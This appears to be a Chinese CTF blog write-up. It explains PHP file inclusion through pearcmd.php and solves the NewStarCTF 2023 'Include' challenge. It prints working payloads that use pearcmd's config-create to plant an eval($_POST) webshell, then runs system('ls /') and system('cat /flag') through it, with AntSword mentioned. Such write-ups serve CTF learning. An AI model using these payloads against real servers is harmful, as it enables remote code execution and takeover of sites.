

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/Suzen.jpg">
  <link rel="icon" href="/img/Suzen.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#4F4F4F">
  <meta name="author" content="Suzen">
  <meta name="keywords" content="">
  
    <meta name="description" content="前置与payload利用pearcmd.php文件包含的前提是register_argc_argv这个要打开 pearcmd.php文件的位置在 &#x2F;usr&#x2F;share&#x2F;php&#x2F;pearcmd.php 或 &#x2F;usr&#x2F;local&#x2F;lib&#x2F;php&#x2F;pearcmd  两种文件位置的payload 1?+config-create+&#x2F;&amp;file&#x3D;&#x2F;usr&#x2F;share&#x2F;php&#x2F;pearcmd.php&amp;">
<meta property="og:type" content="article">
<meta property="og:title" content="pearcmd.php文件包含">
<meta property="og:url" content="https://yschen20.github.io/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/index.html">
<meta property="og:site_name" content="(๑´ڡ&#96;๑)">
<meta property="og:description" content="前置与payload利用pearcmd.php文件包含的前提是register_argc_argv这个要打开 pearcmd.php文件的位置在 &#x2F;usr&#x2F;share&#x2F;php&#x2F;pearcmd.php 或 &#x2F;usr&#x2F;local&#x2F;lib&#x2F;php&#x2F;pearcmd  两种文件位置的payload 1?+config-create+&#x2F;&amp;file&#x3D;&#x2F;usr&#x2F;share&#x2F;php&#x2F;pearcmd.php&amp;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://yschen20.github.io/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604140407295.png">
<meta property="og:image" content="https://yschen20.github.io/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604134228261.png">
<meta property="og:image" content="https://yschen20.github.io/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604134326879.png">
<meta property="og:image" content="https://yschen20.github.io/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604135514809.png">
<meta property="og:image" content="https://yschen20.github.io/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604135849939.png">
<meta property="og:image" content="https://yschen20.github.io/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604135933743.png">
<meta property="og:image" content="https://yschen20.github.io/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604135725046.png">
<meta property="og:image" content="https://yschen20.github.io/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604140848501.png">
<meta property="article:published_time" content="2025-06-04T06:07:19.000Z">
<meta property="article:modified_time" content="2025-06-04T06:14:45.262Z">
<meta property="article:author" content="Suzen">
<meta property="article:tag" content="文件包含 pearcmd.php文件包含">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://yschen20.github.io/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604140407295.png">
<meta name="twitter:creator" content="@Suzen">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>pearcmd.php文件包含 - (๑´ڡ`๑)</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/glassbg.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"yschen20.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2025-04-25T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 100vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Suzen的博客</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/2.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="pearcmd.php文件包含"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        Suzen
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-06-04 14:07" pubdate>
          2025年6月4日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          503 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          5 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        

      
    
  </div>


        
      </div>

      
        <div class="scroll-down-bar">
          <i class="iconfont icon-arrowdown"></i>
        </div>
      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">pearcmd.php文件包含</h1>
            
              <p id="updated-time" class="note note-info" style="display: none">
                
                  
                    本文最后更新于 2025-06-04T14:14:45+08:00
                  
                  

                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="前置与payload"><a href="#前置与payload" class="headerlink" title="前置与payload"></a>前置与payload</h1><p>利用<code>pearcmd.php</code>文件包含的前提是<code>register_argc_argv</code>这个要打开</p>
<p><code>pearcmd.php</code>文件的位置在 <code>/usr/share/php/pearcmd.php</code> 或 <code>/usr/local/lib/php/pearcmd</code></p>
<p><img src="/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604140407295.png" srcset="/img/loading.gif" lazyload alt="image-20250604140407295"></p>
<p>两种文件位置的payload</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby"><span class="hljs-string">?+</span>config-create+<span class="hljs-regexp">/&amp;file=/usr</span><span class="hljs-regexp">/share/php</span><span class="hljs-regexp">/pearcmd.php&amp;/</span>&lt;<span class="hljs-string">?=</span>eval(<span class="hljs-variable">$_POST</span>[<span class="hljs-number">1</span>]);<span class="hljs-string">?&gt;</span>+<span class="hljs-regexp">/var/www</span><span class="hljs-regexp">/html/shell</span>.php <br></code></pre></td></tr></table></figure>

<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby"><span class="hljs-string">?+</span>config-create+<span class="hljs-regexp">/&amp;file=/usr</span><span class="hljs-regexp">/local/lib</span><span class="hljs-regexp">/php/pearcmd</span>&amp;<span class="hljs-regexp">/&lt;?=eval($_POST[1]);?&gt;+/var</span><span class="hljs-regexp">/www/html</span><span class="hljs-regexp">/shell.php</span><br></code></pre></td></tr></table></figure>

<ul>
<li><strong><code>?+config-create+/</code> ：</strong> 触发 <code>pearcmd.php</code> 中的配置创建功能</li>
<li><strong><code>&amp;file=/usr/local/lib/php/pearcmd</code> ：</strong> 指定要包含的文件路径</li>
<li><strong><code>&amp;/</code> ：</strong> 终止参数解析的特殊符号，迫使脚本停止处理后续参数，确保前面的参数被正确解析</li>
</ul>
<p>这就是将一句话木马<code>&lt;?=eval($_POST[1])?&gt;</code>写入了<code>/var/www/html/shell.php</code> </p>
<p>**注意：**要利用bp抓包进行传入，因为如果直接在浏览器中传参，php代码中的部分符号会被url编码之后再写入<code>shell.php</code>文件中，就不会被当成php代码</p>
<h1 id="题目实操"><a href="#题目实操" class="headerlink" title="题目实操"></a>题目实操</h1><blockquote>
<p><strong>题目来源：</strong>[NewStarCTF 2023 公开赛道]Include 🍐</p>
<p><strong>题目网址：</strong> <a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#[NewStarCTF%202023%20%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93]Include%20%F0%9F%8D%90">https://buuoj.cn/challenges#[NewStarCTF%202023%20%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93]Include%20%F0%9F%8D%90</a></p>
</blockquote>
<p>题目源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>    <span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br>    <span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;file&#x27;</span>])) &#123;<br>        <span class="hljs-variable">$file</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;file&#x27;</span>];<br>        <br>        <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/flag|log|session|filter|input|data/i&#x27;</span>, <span class="hljs-variable">$file</span>)) &#123;<br>            <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;hacker!&#x27;</span>);<br>        &#125;<br>        <br>        <span class="hljs-keyword">include</span>(<span class="hljs-variable">$file</span>.<span class="hljs-string">&quot;.php&quot;</span>);<br>        <span class="hljs-comment"># Something in phpinfo.php!</span><br>    &#125;<br>    <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>    &#125;<br><span class="hljs-meta">?&gt;</span> <br></code></pre></td></tr></table></figure>

<p>提示<code>phpinfo.php</code>中有东西，进行包含看看</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">?<span class="hljs-attribute">file</span>=phpinfo<br></code></pre></td></tr></table></figure>

<p><img src="/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604134228261.png" srcset="/img/loading.gif" lazyload alt="image-20250604134228261"></p>
<figure class="highlight dust"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dust"><span class="language-xml">fake</span><span class="hljs-template-variable">&#123;Check_register_argc_argv&#125;</span><br></code></pre></td></tr></table></figure>

<p>是个假的flag，不过也是个提示，检查<code>register_argc_argv</code></p>
<p><img src="/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604134326879.png" srcset="/img/loading.gif" lazyload alt="image-20250604134326879"></p>
<p>会发现<code>register_argc_argv</code>是开着的，也就是说可以对<code>pearcmd.php</code>文件进行包含利用</p>
<p>这里使用的在<code>/usr/local/lib/php/pearcmd</code></p>
<p>payload</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby"><span class="hljs-string">?+</span>config-create+<span class="hljs-regexp">/&amp;file=/usr</span><span class="hljs-regexp">/local/lib</span><span class="hljs-regexp">/php/pearcmd</span>&amp;<span class="hljs-regexp">/&lt;?=eval($_POST[1]);?&gt;+/var</span><span class="hljs-regexp">/www/html</span><span class="hljs-regexp">/shell.php</span><br></code></pre></td></tr></table></figure>

<p>**注意：**要利用bp抓包进行传入，因为如果直接在浏览器中传参，php代码中的部分符号会被url编码之后再写入<code>shell.php</code>文件中，就不会被当成php代码</p>
<p><img src="/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604135514809.png" srcset="/img/loading.gif" lazyload alt="image-20250604135514809"></p>
<p>然后直接浏览器访问<code>/shell.php</code>进行RCE，POST传参1</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">1</span>=system(<span class="hljs-string">&#x27;ls /&#x27;</span>)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure>

<p><img src="/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604135849939.png" srcset="/img/loading.gif" lazyload alt="image-20250604135849939"></p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">1</span>=system(<span class="hljs-string">&#x27;cat /flag&#x27;</span>)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure>

<p><img src="/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604135933743.png" srcset="/img/loading.gif" lazyload alt="image-20250604135933743"></p>
<p>也可以用蚁剑连</p>
<p><img src="/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604135725046.png" srcset="/img/loading.gif" lazyload alt="image-20250604135725046"></p>
<p><img src="/2025/06/04/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20250604140848501.png" srcset="/img/loading.gif" lazyload alt="image-20250604140848501"></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0/" class="category-chain-item">漏洞笔记</a>
  
  
    <span>></span>
    
  <a href="/categories/%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" class="category-chain-item">文件包含</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" class="print-no-link">#文件包含 pearcmd.php文件包含</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>pearcmd.php文件包含</div>
      <div>https://yschen20.github.io/2025/06/04/pearcmd-php文件包含/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Suzen</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年6月4日</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>更新于</div>
          <div>2025年6月4日</div>
        </div>
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/06/06/Flask-SSTI%E9%99%90%E5%88%B6%E9%95%BF%E5%BA%A6%E7%BB%95%E8%BF%87/" title="Flask-SSTI限制长度绕过">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Flask-SSTI限制长度绕过</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/05/30/LitCTF-2025-web/" title="LitCTF-2025-web">
                        <span class="hidden-mobile">LitCTF-2025-web</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="twikoo"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/twikoo/1.6.8/twikoo.all.min.js', function() {
        var options = Object.assign(
          {"envId":"https://imagegoo-twikoo.hf.space","region":"ap-shanghai","path":"window.location.pathname"},
          {
            el: '#twikoo',
            path: 'window.location.pathname',
            onCommentLoaded: function() {
              Fluid.utils.listenDOMLoaded(function() {
                var imgSelector = '#twikoo .tk-content img:not(.tk-owo-emotion)';
                Fluid.plugins.imageCaption(imgSelector);
                Fluid.plugins.fancyBox(imgSelector);
              });
            }
          }
        )
        twikoo.init(options)
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  var relativeDate = function() {
    var updatedTime = document.getElementById('updated-time');
    if (updatedTime) {
      var text = updatedTime.textContent;
      var reg = /\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:Z|[+-]\d{2}:\d{2})/;
      var matchs = text.match(reg);
      if (matchs) {
        var relativeTime = moment(matchs[0]).fromNow();
        updatedTime.textContent = text.replace(reg, relativeTime);
      }
      updatedTime.style.display = '';
    }
  };
  Fluid.utils.createScript('https://lib.baomitu.com/moment.js/2.29.4/moment.min.js', function() {
    if (!'zh-cn'.startsWith('en')) {
      Fluid.utils.createScript('https://lib.baomitu.com/moment.js/2.29.4/locale/zh-cn.min.js', function() {
        relativeDate();
      });
    } else {
      relativeDate();
    }
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
